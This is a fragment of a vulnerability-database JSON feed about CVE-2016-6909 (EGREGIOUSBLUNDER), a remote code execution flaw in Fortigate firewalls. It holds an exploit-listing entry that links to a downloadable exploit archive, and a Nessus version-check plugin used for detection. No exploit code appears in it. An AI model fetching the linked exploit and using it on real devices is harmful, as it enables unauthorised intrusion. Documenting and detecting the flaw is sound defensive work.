[{"lastseen": "2018-04-11T15:03:24", "edition": 2, "description": "Exploit for hardware platform in category web applications", "published": "2016-08-19T00:00:00", "type": "zdt", "title": "Fortigate Firewalls - 'EGREGIOUSBLUNDER' Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6909"], "modified": "2016-08-19T00:00:00", "id": "1337DAY-ID-25265", "href": "https://0day.today/exploit/description/25265", "sourceData": "# Exploit Title: Fortigate Firewalls - Remote Code Execution (EGREGIOUSBLUNDER)\r\n# Date: 19-08-2016\r\n# Exploit Author: Shadow Brokers\r\n# Vendor Homepage: https://www.fortinet.com/products/fortigate/\r\n \r\n \r\nFull Exploit:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40276.zip\n\n# 0day.today [2018-04-11] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25265"}], "nessus": [{"lastseen": "2021-02-01T02:44:40", "description": "The remote FortiGate device is running a version of FortiOS that is\n4.1.x prior to 4.1.11, 4.2.x prior to 4.2.13, or 4.3.x prior to 4.3.9. \nIt is, therefore, affected by a remote code execution vulnerability,\nknown as EGREGIOUSBLUNDER, in the web interface due to improper\nvalidation when parsing cookies. An unauthenticated, remote attacker\ncan exploit this, via a specially crafted HTTP request, to cause a\nbuffer overflow condition, resulting in a denial of service condition\nor the execution of arbitrary code. \n\n\nEGREGIOUSBLUNDER is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2016/08/14 by a group known as the Shadow\nBrokers.", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-08-26T00:00:00", "title": "Fortinet FortiOS 4.1.x < 4.1.11 / 4.2.x < 4.2.13 / 4.3.x < 4.3.9 Web Interface Cookie Parser RCE (EGREGIOUSBLUNDER)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6909"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:fortinet:fortios"], "id": "FORTIOS_FG-IR-16-023.NASL", "href": "https://www.tenable.com/plugins/nessus/93128", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93128);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2016-6909\");\n script_bugtraq_id(92523);\n script_xref(name:\"EDB-ID\", value:\"40276\");\n\n script_name(english:\"Fortinet FortiOS 4.1.x < 4.1.11 / 4.2.x < 4.2.13 / 4.3.x < 4.3.9 Web Interface Cookie Parser RCE (EGREGIOUSBLUNDER)\");\n script_summary(english:\"Checks version of FortiOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote FortiGate device is running a version of FortiOS that is\n4.1.x prior to 4.1.11, 4.2.x prior to 4.2.13, or 4.3.x prior to 4.3.9. \nIt is, therefore, affected by a remote code execution vulnerability,\nknown as EGREGIOUSBLUNDER, in the web interface due to improper\nvalidation when parsing cookies. An unauthenticated, remote attacker\ncan exploit this, via a specially crafted HTTP request, to cause a\nbuffer overflow condition, resulting in a denial of service condition\nor the execution of arbitrary code. \n\n\nEGREGIOUSBLUNDER is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2016/08/14 by a group known as the Shadow\nBrokers.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://fortiguard.com/psirt/FG-IR-16-023\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Fortinet FortiOS 4.1.11 / 4.2.13 / 4.3.9 / 5.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\",value:\"2016/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\",value:\"2016/08/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/26\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"local\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/o:fortinet:fortios\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"fortinet_version.nbin\");\n script_require_keys(\"Host/Fortigate/model\", \"Host/Fortigate/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"FortiOS\";\n\nversion = get_kb_item_or_exit(\"Host/Fortigate/version\");\nmodel = get_kb_item_or_exit(\"Host/Fortigate/model\");\n\n# Make sure device is FortiGate\nif (!preg(string:model, pattern:\"fortigate\", icase:TRUE)) audit(AUDIT_HOST_NOT, \"a FortiGate\");\n\nif (version =~ \"^4\\.1\\.\") fix = \"4.1.11\";\nelse if (version =~ \"^4\\.2\\.\") fix = \"4.2.13\";\nelse if (version =~ \"^4\\.3\\.\") fix = \"4.3.9\";\nelse audit(AUDIT_INST_VER_NOT_VULN, app_name, version);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n report =\n '\\n Model : ' + model +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(severity:SECURITY_HOLE, extra:report, port:0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app_name, version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}